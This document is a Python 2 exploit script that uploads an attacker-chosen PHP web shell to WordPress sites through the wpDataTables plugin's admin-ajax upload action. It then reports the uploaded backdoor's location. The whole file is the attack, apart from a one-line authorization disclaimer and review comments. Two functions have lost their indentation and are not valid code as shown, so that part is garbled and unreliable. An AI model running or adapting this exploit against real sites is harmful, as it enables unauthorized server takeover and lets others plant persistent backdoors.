import urllib, urllib2, sys, re
import optparse
import os, os.path
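def checkurl(url):
    """Validate the target URL given with ``-t`` and return it unchanged.

    NOTE(review): the test condition of this function did not survive in
    this listing (only the ``sys.exit(1)`` and ``else`` branches are left,
    which is not even valid syntax). This reconstruction accepts exactly the
    form the usage text promises, ``http[s]://host[:port]``, and refuses
    anything else so that a bare hostname is not silently glued onto the
    admin-ajax path later on.

    Args:
        url: Target base URL as typed on the command line.

    Returns:
        ``url`` unchanged when it starts with an http or https scheme.

    Raises:
        SystemExit: with status 1 when the URL carries no http(s) scheme.
    """
    # Scheme check only; resolving the host is left to the HTTP layer.
    if not re.match(r'^https?://', url, re.IGNORECASE):
        print('[X] ' + url + ' is not a valid URL (expected http[s]://host[:port])')
        sys.exit(1)
    else:
        return url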
def checkfile( file ):
if not os.path.isfile( file ) and not os.access( file , os.R_OK):
print '[X] ' + file + ' file is missing or not readable'
sys.exit( 1 )
else :
return file
def create_body_sh3ll_upl04d(payloadname):
getfields = dict ()
payloadcontent = open (payloadname).read()
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
CRLF = '\r\n'
L = []
for (key, value) in getfields.items():
L.append( '--' + LIMIT)
L.append( 'Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
L.append( '--' + LIMIT)
L.append( 'Content-Disposition: form-data; name="%s"; filename="%s"' % ( 'files[]' , payloadname))
L.append( 'Content-Type: application/force-download' )
L.append('')
L.append(payloadcontent)
L.append( '--' + LIMIT + '--' )
L.append('')
body = CRLF.join(L)
return body
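# Entry point: parse -t/-f/--timeout, build the multipart body and POST it
# to the wpDataTables admin-ajax upload action. Only run this against
# systems you are authorized to test.
#
# NOTE(review): the banner text did not survive in this listing; an empty
# string keeps the two print(banner) calls below harmless.
banner = ''
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                       help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                       )
commandList.add_option('-f', '--file', action="store",
                       help="Insert file name, ex: shell.php",
                       )
commandList.add_option('--timeout', action="store", default=10, type="int",
                       help="[Timeout Value] - Default 10",
                       )
options, remainder = commandList.parse_args()
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)
payloadname = checkfile(options.file)
# A trailing slash on the target would otherwise yield '//wp-admin/...'.
host = checkurl(options.target).rstrip('/')
timeout = options.timeout
print(banner)
url_wpdatatab_upload = host + '/wp-admin/admin-ajax.php?action=wdt_upload_file'
# Must match the boundary hard-coded in create_body_sh3ll_upl04d().
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
bodyupload = create_body_sh3ll_upl04d(payloadname)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload))}
try:
    req = urllib2.Request(url_wpdatatab_upload, bodyupload, headers)
    # --timeout was parsed but never passed along in the original, so the
    # option had no effect; urlopen takes it directly.
    response = urllib2.urlopen(req, timeout=timeout)
    read = response.read()
    # admin-ajax.php answers a bare "0" when the action was not handled.
    if "error" in read or read == "0":
        print("[X] Upload Failed :(")
    else:
        match = re.compile('\"url\":\"(.*?)\",\"').search(read)
        if match is None:
            # Do not crash on .group() of None: show the reply so the
            # operator can judge what happened.
            print("[?] Unexpected response, no url field found:")
            print(read)
        else:
            backdoor_location = match.group(1)
            print("[!] Shell Uploaded")
            # Strip JSON escaping (\/ -> /) from the returned location.
            print("[!] Location: " + backdoor_location.replace("\\", ""))
except urllib2.HTTPError as e:
    print("[X] Http Error: " + str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: " + str(e))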